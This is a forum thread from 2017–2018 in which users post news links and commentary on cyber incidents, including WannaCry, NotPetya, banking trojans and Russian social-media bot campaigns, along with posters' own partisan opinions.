Here in NZ, due to our recent and serious seismic activity, we've had a national resilience campaign for personal preparation in case of a future disaster.

I believe strongly that we are well past the point where we should be conducting national continuous "patch and update" campaigns, to the point of aggressive nudging behaviour in perpetual pursuit of herd device immunity.

"Loose lips sink ships" for the age of interconnectivity.

flagg
06-22-2017, 09:12 AM
Quantum entanglement as a means of potential cyber/coms resilience:

https://www.scientificamerican.com/article/china-shatters-ldquo-spooky-action-at-a-distance-rdquo-record-preps-for-quantum-internet/

I knew quantum computing would be an eventual game changer with even recent 1024 bit encryption, but was unaware of quantum entanglement being used as a potential tool to defend against hacking and cracking.

It's way over my head, but Moore's Law continues on its 52 year relentless journey.

flagg
06-22-2017, 07:46 PM
A cyber attack the world isn't ready for

https://www.nytimes.com/2017/06/22/technology/ransomware-attack-nsa-cyberweapons.html

Wannacry is the focus, but Doublepulsar backdoor may be a bigger threat

OUTLAW 09
06-25-2017, 12:10 PM
BTW...while the US Congress approved 200M USDs to fight Russian info warfare BUT US social media FB, Twitter, Instagram and others seem to be unable to control hate, violence and propaganda being posted minute by minute EVEN though they admit they could....

BTW...the Trump government has promised a propaganda pushback but not spent a single cent of the 200M USD...

BTW...the Germans have effectively told the US social media companies to either control what they know they can actually control and if not then 50K Euros per violation.....ACTUALLY not a problem for them to pay the fines as they make billions.....

At least the Germans are doing something compared to the apparent inaction of Trump who has 200M USDs to spend in this effort....

OUTLAW 09
06-25-2017, 12:11 PM
Snapchat launches new feature that lets people know where you are at any moment

Not good for your own personal safety....

OUTLAW 09
06-26-2017, 10:43 AM
A former employee was sentenced to one year and one day in prison for damaging the IT networks of several water utility providers across the US East Coast.
http://securityaffairs.co/wordpress/60425/cyber-crime/water-utility-networks-hacked.html



Adam Flanagan (42) of Bala Cynwyd, PA was sentenced to one year and one day in prison by a Pennsylvania court for damaging the IT networks of several water utility providers across the US East Coast.
The news was reported by Bleeping Computer; the man worked between November 2007 and November 2013 as an engineer for an unnamed company that manufactured smart water, electric, and gas readers.
Among Flanagan's tasks was the set-up of Tower Gateway Basestations (TGB) for the customers, which were mainly water utility networks.
The Tower Gateway Basestations are essential components for water facility networks composed of smart meters installed at people's homes that exchange data with water facility operators' systems.
These networks allow water facility operators to collect consumption data and check the status of the installs at the customers' homes.
On November 16, 2013, the company fired Flanagan for undisclosed reasons, then the man decided to punish the company by shutting down the TGB stations, paralyzing the water facility networks of the company's customers. Flanagan also changed passwords on some TGBs, using offensive words.
The utility providers had to send out employees to customer homes to collect monthly readings about their consumption.
"According to court documents, the FBI tracked down Flanagan's actions to six incidents in five cities across the US East Coast: Aliquippa (Pennsylvania), Egg Harbor (New Jersey), Kennebec (Maine), New Kensington (Pennsylvania), and Spotswood (New Jersey)," reported Catalin Cimpanu from Bleepingcomputer.

The investigators were able to identify the former employee as responsible for the incidents, then the US authorities filed charges on November 22, 2016.
Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017 and on June 14, 2017 he was sentenced to one year in jail; let me say that the judges were clement.

OUTLAW 09
06-26-2017, 11:16 AM
Pinkslipbot banking Trojan exploiting infected machines as control servers
http://securityaffairs.co/wordpress/60233/malware/pinkslipbot-banking-trojan.html


Pinkslipbot banking Trojan is a banking Trojan that uses a complicated multistage proxy for HTTPS-based control server communication. Security researchers at McAfee Labs have spotted a new strain of the Pinkslipbot banking malware (also known as QakBot/QBot)

OUTLAW 09
06-29-2017, 07:12 AM
!!! Zero-day Skype flaw causes crashes, remote code execution (CVE-2017-9948) -

OUTLAW 09
06-29-2017, 07:14 AM
NOTE

All of the running information on the Russian deliberate cyber attack on Ukraine is being threaded on the Russian propaganda thread....as it is in fact a Russian targeted cyber attack...especially when one "sees" the control servers sitting deep inside Russia.....

OUTLAW 09
07-03-2017, 05:38 PM
Useful analyses on Petya, the camouflaged wiper targeting Ukraine

https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/
https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4?source=linkShare-8c278323b47c-1498684536
https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/

OUTLAW 09
07-03-2017, 05:48 PM
Puppet Strings - Dirty Secret for Free Windows Ring 0 Code Execution https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html

OUTLAW 09
07-03-2017, 05:50 PM
Petya’s kill-chain diagram in Windows 10. Device Guard, Credential Guard, UEFI Secure Boot, AppLocker, KASLR, HALNX

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/?platform=hootsuite

OUTLAW 09
07-03-2017, 05:53 PM
ThreadContinue - Reflective Injection Using SetThreadContext() and NtContinue()
https://zerosum0x0.blogspot.com/2017/07/threadcontinue-reflective-injection.html

flagg
07-04-2017, 06:55 AM
Petya’s kill-chain diagram in Windows 10. Device Guard, Credential Guard, UEFI Secure Boot, AppLocker, KASLR, HALNX

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/?platform=hootsuite

One interesting item is the limited execution time of 60 minutes.

I'm not a cyber SME, but I wonder where 60 minutes sits on the continuum?

If on the low end, and assuming it was done so intentionally, does that mean this might have been meant as both an intentional attack (not ransomware) on Ukraine as well as a message to NATO/EU/US unlikely to draw a direct cyber counterattack?

To me, if the 60 minute execution time is quite short, then it would seem to be designed to burn out like digital Ebola with a limited incubation period, instead of lingering like the Plague.

OUTLAW 09
07-06-2017, 05:36 PM
One interesting item is the limited execution time of 60 minutes.

I'm not a cyber SME, but I wonder where 60 minutes sits on the continuum?

If on the low end, and assuming it was done so intentionally, does that mean this might have been meant as both an intentional attack (not ransomware) on Ukraine as well as a message to NATO/EU/US unlikely to draw a direct cyber counterattack?

To me, if the 60 minute execution time is quite short, then it would seem to be designed to burn out like digital Ebola with a limited incubation period, instead of lingering like the Plague.

You have some interesting comments....there is nothing by accident on this malware....appears to be sloppy in coding but highly destructive when unleashed...appears to be ransomware but it is really a wiper of MBF of computer...and interestingly when detected by say AV or MS Defender software it immediately starts to destroy the MBF with no hesitation whatsoever...

Coupled with an LSADump hacking tool designed to collect all passwords laterally from the infected pc as well as all lateral domain servers and pass that info via exfil then this was in fact a highly thought through cyber attack...setting up the network for future easier attacks...

BTW..you are correct..by appearing to be at first a ransomware they slide under the Article 5 radar......that was intentional...

Alone the damage to Maersk Shipping was a total of 480M USDs...that is a lot of damage for a so called ransomware.

PLUS the choice of targets were exactly what you would expect from a direct cyber invasion...banks and ATMs, fuel points, food stores, radio and TV and social media, transportation ground and air and the central bank....all designed to create panic and confusion in the first hours...

https://www.theguardian.com/technology/2017/jun/28/notpetya-ransomware-attack-ukraine-russia


A ransomware attack that affected at least 2,000 individuals and organisations worldwide on Tuesday appears to have been deliberately engineered to damage IT systems rather than extort funds, according to security researchers.
The attack began in Ukraine, and spread through a hacked Ukrainian accountancy software developer to companies in Russia, western Europe and the US. The software demanded payment of $300 (£230) to restore the user’s files and settings.
The malware’s advanced intrusion techniques were in stark contrast with its rudimentary payment infrastructure, according to a pseudonymous security researcher known as “the grugq”.

The researcher said the software was “definitely not designed to make money” but “to spread fast and cause damage, [using the] plausibly deniable cover of ‘ransomware’”.
This analysis was supported by UC Berkley academic Nicholas Weaver, who told the infosec blog Krebs on Security: “I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware.”

AdamG
07-13-2017, 08:06 PM
In early May six U.S. intelligence and law enforcement agency chiefs were asked in an open Senate hearing whether they’d let their networks use Kaspersky software, often found on Best Buy shelves. The answer was a unanimous and resounding no. The question, from Florida Republican Marco Rubio, came out of nowhere, often a sign a senator is trying to indirectly draw attention to something learned in classified briefings.

Eugene Kaspersky took to Reddit to respond. Claims about Kaspersky Lab’s ties to the Kremlin are “unfounded conspiracy theories” and “total BS,” the company’s boisterous, barrel-chested chief executive officer wrote.
https://www.bloomberg.com/news/articles/2017-07-11/kaspersky-lab-has-been-working-with-russian-intelligence

OUTLAW 09
07-14-2017, 03:01 PM
WARNING

Russian trolls are attacking twitter users with an app that makes Twitter think you're trying to approve a malicious third party app, causing Twitter to lock your account for safety reasons.

Don't fret, you've not been hacked, this is part... of an intense pro-active troll-farm op designed to keep users from discussing the crumbling Trump presidency.

Russia sees their asset (Trump) falling apart and are doing everything to control the news. It's a hail-mary pass.

Today we have seen over 2.5M Russian controlled Twitter bots swarming out to block as many anti Trump twitter accounts that are reporting on anything pertaining to Trump, Trump Jr. and Russians.

Currently Trump Followers have climbed to 1.8M in just under four weeks AND all are non human bots that is averaging 450K per week and that costs a lot of money to create even on the criminal side of twitter.

This is a concentrated attack against non Trump supporters on Twitter AND Twitter Support has remained largely silent.....WHY is that.

This is the third type of Russian twitter attack in the last ten days...

There is now a true Russian social media info war and it is up front and in your face and the US government also says nothing.

OUTLAW 09
07-14-2017, 03:10 PM
WARNING

Private Email of Top U.S. Russia Intelligence Official Hacked http://foreignpolicy.com/2017/07/14/private-email-of-top-u-s-russia-intelligence-official-hacked/

Some are saying APT28 GRU again.

OUTLAW 09
07-14-2017, 04:58 PM
WARNING

MASSIVE TROLL ACTIVITY: Do not click on any links from anyone you don't know. 1000s of compromised accts in past 24 hours.

OUTLAW 09
07-15-2017, 11:43 AM
WARNING

Russian trolls are attacking twitter users with an app that makes Twitter think you're trying to approve a malicious third party app, causing Twitter to lock your account for safety reasons.

Don't fret, you've not been hacked, this is part... of an intense pro-active troll-farm op designed to keep users from discussing the crumbling Trump presidency.

Russia sees their asset (Trump) falling apart and are doing everything to control the news. It's a hail-mary pass.

Today we have seen over 2.5M Russian controlled Twitter bots swarming out to block as many anti Trump twitter accounts that are reporting on anything pertaining to Trump, Trump Jr. and Russians.

Currently Trump Followers have climbed to 1.8M in just under four weeks AND all are non human bots that is averaging 450K per week and that costs a lot of money to create even on the criminal side of twitter.

This is a concentrated attack against non Trump supporters on Twitter AND Twitter Support has remained largely silent.....WHY is that.

This is the third type of Russian twitter attack in the last ten days...

There is now a true Russian social media info war and it is up front and in your face and the US government also says nothing.

Seems anyone criticizing Putins invasion of Ukraine is on the list. Mine was locked out early this morning.

There is a concentrated attempt by Russian trolls and bots to block all anti Trump and proUkraine Twitter accounts

davidbfpo
07-21-2017, 02:47 PM
This landed via a local university IT advisory alert:
Apple released a critical update (iOS 10.3.3) on Wednesday 19 July to update security vulnerabilities within your contacts, messages, notifications and Safari. This affects the following devices: iPhone 5 to iPhone 7, fourth-generation iPad and later versions, and the iPod Touch 6th generation. Instructions on how to update the iOS software can be found here: https://support.apple.com/en-gb/HT204204
More information on the update can be found here: https://www.cnet.com/news/apple-security-update-iphone-ipad-ios-hack-broadpwn/

OUTLAW 09
08-31-2017, 06:46 AM
For the last three months my IT company, together with German partners, @bellingcat, DFLab and tens of twitter users have been literally in a state of open non violent bot army war and believe me they do exist and Russia is extremely good at using them for disinformation, propaganda, spamming and criminal hacking.

This has now reached a certain sophistication that is not normal on the part of Russian intel services so that one can actually use the term open info war fought 24 x 7 X 365 for the heart and soul of a society

Since the Russia infowar thread is closed I will post all links that are available on this thread as it does apply to malware, disinformation and propaganda and hacking all tied into one namely bots.

Enjoy the reading and hopefully one can learn what really Russian infowarfare looks like in the 21st century

https://medium.com/dfrlab/kremlin-and-alt-right-share-nazi-narrative-2df4af60c749

https://www.propublica.org/article/pro-russian-bots-take-up-the-right-wing-cause-after-charlottesville

http://www.moonofalabama.org/

IMPORTANT
https://twitter.com/conspirator0

https://medium.com/dfrlab/german-election-the-curious-case-of-the-far-right-feed-84cc7a8dabd9

https://medium.com/dfrlab/german-election-merkelmussweg-explained-b218dd6d4b7f

https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit

http://www.politico.com/magazine/story/2017/08/23/russia-propaganda-network-kremlin-bots-215520

https://medium.com/@d1gi/can-elections-be-bot-970d4b4ae430

https://medium.com/@d1gi/who-hacked-the-election-43d4019f705f

https://medium.com/@d1gi/election2016-propaganda-lytics-weaponized-shadow-trackers-a6c9281f5ef9

https://medium.com/@d1gi/the-election2016-micro-propaganda-machine-383449cc1fba

https://medium.com/dfrlab/from-russia-with-hategroup-ae6ee4318b5b

.@Twitter bots in action - #Russian #informationwarfare methods designed for "easy exploitation - high impact"
http://bit.ly/2p3b30p

IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/s...y-battle.html#

https://www.technologyreview.com/s/603404/cybersecurity-experts-uncover-dormant-botnet-of-350000-twitter-accounts/

Ref: arxiv.org/abs/1701.02405:
The “Star Wars” botnet with >350k Twitter bots

https://www.wired.com/story/leaked-alt-right-chat-logs-are-key-to-charlottesville-lawsuits

https://medium.com/dfrlab/botspot-twelve-ways-to-spot-a-bot-aedc7d9c110c

https://twitter.com/DFRLab

https://medium.com/@mentionmapp/fakenews-getting-real-socialbots-swamping-propublica-37a96c518b89

https://medium.com/@Felt/grand-theory-supp-4-abc25d6a8756

http://www.independent.co.uk/news/uk/home-news/david-jones-pro-brexit-ukip-twitter-account-russia-fake-bot-troll-trump-disinformation-followers-a7920181.html

How a Bot Army Probably Got Me Kicked Off Twitter
http://www.thedailybeast.com/how-a-bot-army-probably-got-me-kicked-off-twitter?source=twitter&via=mobile

AdamG
11-12-2017, 06:44 PM
$20 says the Kremlin just ordered three gross of this product.
https://www.theverge.com/2017/11/10/16634442/lovense-sex-toy-spy-surveillance

AdamG
11-17-2017, 03:45 PM
Could terrorists hijack an airliner remotely by hacking into its cockpit controls, putting its fate in their hands?
This question is being asked because of the revelation that a team of cyber experts at the Department of Homeland Security successfully hacked into the avionics of a commercial airplane parked at an airport as part of a test.
The problem is that nobody with knowledge of aviation cyber security is sure of how vulnerable airplanes are to such an attack—and some believe that the DHS test has simply added to the confusion and created needless alarm.
A Boeing spokesman told The Daily Beast: “We witnessed the test and can say unequivocally that there was no hack of the airplane’s flight control systems.”
Information about the extent of the test is restricted and there is a strong feeling among hacking experts that the full extent of the threat will remain underestimated—as they claim it has been for years.

https://www.thedailybeast.com/could-terrorists-hack-an-airplane-the-government-just-did

kaur
11-18-2017, 10:39 AM
For the last three months my IT company, together with German partners, @bellingcat, DFLab and tens of twitter users have been literally in a state of open non violent bot army war and believe me they do exist and Russia is extremely good at using them for disinformation, propaganda, spamming and criminal hacking.

This has now reached a certain sophistication that is not normal on the part of Russian intel services so that one can actually use the term open info war fought 24 x 7 X 365 for the heart and soul of a society

Since the Russia infowar thread is closed I will post all links that are available on this thread as it does apply to malware, disinformation and propaganda and hacking all tied into one namely bots.

Enjoy the reading and hopefully one can learn what really Russian infowarfare looks like in the 21st century

https://medium.com/dfrlab/kremlin-and-alt-right-share-nazi-narrative-2df4af60c749

https://www.propublica.org/article/pro-russian-bots-take-up-the-right-wing-cause-after-charlottesville

http://www.moonofalabama.org/

IMPORTANT
https://twitter.com/conspirator0

https://medium.com/dfrlab/german-election-the-curious-case-of-the-far-right-feed-84cc7a8dabd9

https://medium.com/dfrlab/german-election-merkelmussweg-explained-b218dd6d4b7f

https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit

http://www.politico.com/magazine/story/2017/08/23/russia-propaganda-network-kremlin-bots-215520

https://medium.com/@d1gi/can-elections-be-bot-970d4b4ae430

https://medium.com/@d1gi/who-hacked-the-election-43d4019f705f

https://medium.com/@d1gi/election2016-propaganda-lytics-weaponized-shadow-trackers-a6c9281f5ef9

https://medium.com/@d1gi/the-election2016-micro-propaganda-machine-383449cc1fba

https://medium.com/dfrlab/from-russia-with-hategroup-ae6ee4318b5b

.@Twitter bots in action - #Russian #informationwarfare methods designed for "easy exploitation - high impact"
http://bit.ly/2p3b30p

IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/s...y-battle.html#

https://www.technologyreview.com/s/603404/cybersecurity-experts-uncover-dormant-botnet-of-350000-twitter-accounts/

Ref: arxiv.org/abs/1701.02405:
The “Star Wars” botnet with >350k Twitter bots

https://www.wired.com/story/leaked-alt-right-chat-logs-are-key-to-charlottesville-lawsuits

https://medium.com/dfrlab/botspot-twelve-ways-to-spot-a-bot-aedc7d9c110c

https://twitter.com/DFRLab

https://medium.com/@mentionmapp/fakenews-getting-real-socialbots-swamping-propublica-37a96c518b89

https://medium.com/@Felt/grand-theory-supp-4-abc25d6a8756

http://www.independent.co.uk/news/uk/home-news/david-jones-pro-brexit-ukip-twitter-account-russia-fake-bot-troll-trump-disinformation-followers-a7920181.html

How a Bot Army Probably Got Me Kicked Off Twitter
http://www.thedailybeast.com/how-a-bot-army-probably-got-me-kicked-off-twitter?source=twitter&via=mobile

Is this all connected to this Russian RT translated Kommersant news from 2012?


Third, and probably most important, of the systems is Storm-12 – its task is to automatically spread the necessary information through the blogosphere, as well as “information support of operations with pre-prepared scenarios of influence on mass audience in social networks.”

The first two systems are to be ready by the end of 2012 and the third by 2013.

https://www.rt.com/politics/intelligence-orders-influencing-social-619/

kaur
11-20-2017, 07:03 AM
Comment on my last post. The SVR tender timing seems to be directly connected to Putin's December 2011 Bolotnaya and spring 2012 mass protest problem. Putin's people failed to control social-networking platforms, especially Facebook and Twitter, due to technical and political reasons. The 2016 US elections show they have found a modus operandi.

AdamG
11-28-2017, 06:24 PM
$20 says the Kremlin just ordered three gross of this product.
https://www.theverge.com/2017/11/10/16634442/lovense-sex-toy-spy-surveillance

You people in the Peanut Gallery thought I was kidding. Anna Chapman's probably already filling out the Amazon . com order page.


A British company has released the first pictures of a ‘smart condom’ which collects very intimate data about the sex life of anyone brave enough to wear it. The device is called the i.Con and can detect STIs as well as sending data about a sex session straight to the wearer’s smartphone.

Read more: http://metro.co.uk/2017/11/28/worlds-first-spy-condom-collects-intimate-data-during-sex-and-tells-men-whether-their-performance-is-red-hot-or-a-total-flop-7116049

AdamG
12-19-2017, 01:34 PM
(CNN)White House homeland security adviser Tom Bossert said Monday the United States believes North Korea was behind the "WannaCry" cyberattack earlier this year.
"After careful investigation, the US today publicly attributes the massive 'WannaCry' cyberattack to North Korea," Bossert wrote in a Wall Street Journal op-ed.
He continued, "The attack was widespread and cost billions, and North Korea is directly responsible."
http://www.cnn.com/2017/12/18/politics/white-house-tom-bossert-north-korea-wannacry/index.html

Previous posts-in-thread on WannaCry.
http://council.smallwarsjournal.com/search.php?searchid=6713937
You're welcome.

AdamG
02-07-2018, 10:35 PM
WASHINGTON (AP) — Russian cyberspies pursuing the secrets of military drones and other sensitive U.S. defense technology tricked key contract workers into exposing their email to theft, an Associated Press investigation has found.
What ultimately may have been stolen is uncertain, but the hackers clearly exploited a national vulnerability in cybersecurity: poorly protected email and barely any direct notification to victims.
The hackers known as Fancy Bear, who also intruded in the U.S. election, went after at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms or other sensitive activities, the AP found.
https://www.apnews.com/cc616fa229da4d59b230d88cd52dda51/Russian-hackers-hunt-hi-tech-secrets,-exploiting-US-weakness

AdamG
02-07-2018, 10:37 PM
LOS ANGELES — Buyer beware. If you’ve snapped up a smart TV, with built-in Netflix, YouTube, Hulu and other Web connections, heads up on this warning — your smart TV could make you vulnerable to hackers and is probably monitoring more of your viewing than you realize.
Consumer Reports just analyzed smart TVs from five big U.S. TV brands — Samsung, LG, Sony, TCL and Vizio — and found several problems. All can track what consumers watch, and two of the brands failed a basic security test.
How bad is the security? So poor, according to its report, that hackers were able to take over complete remote control of the TVs from Samsung and TCL's branded Roku TV, which included changing channels, upping the volume, installing new apps and playing objectionable content from YouTube.
"What we found most disturbing about this was the relative simplicity of" hacking in, says Glenn Derene, Consumer Reports' senior director of content.

https://www.usatoday.com/story/tech/talkingtech/2018/02/07/your-smart-tv-may-prey-hackers-and-collecting-more-info-than-you-realize-consumer-reports-warns/311903002/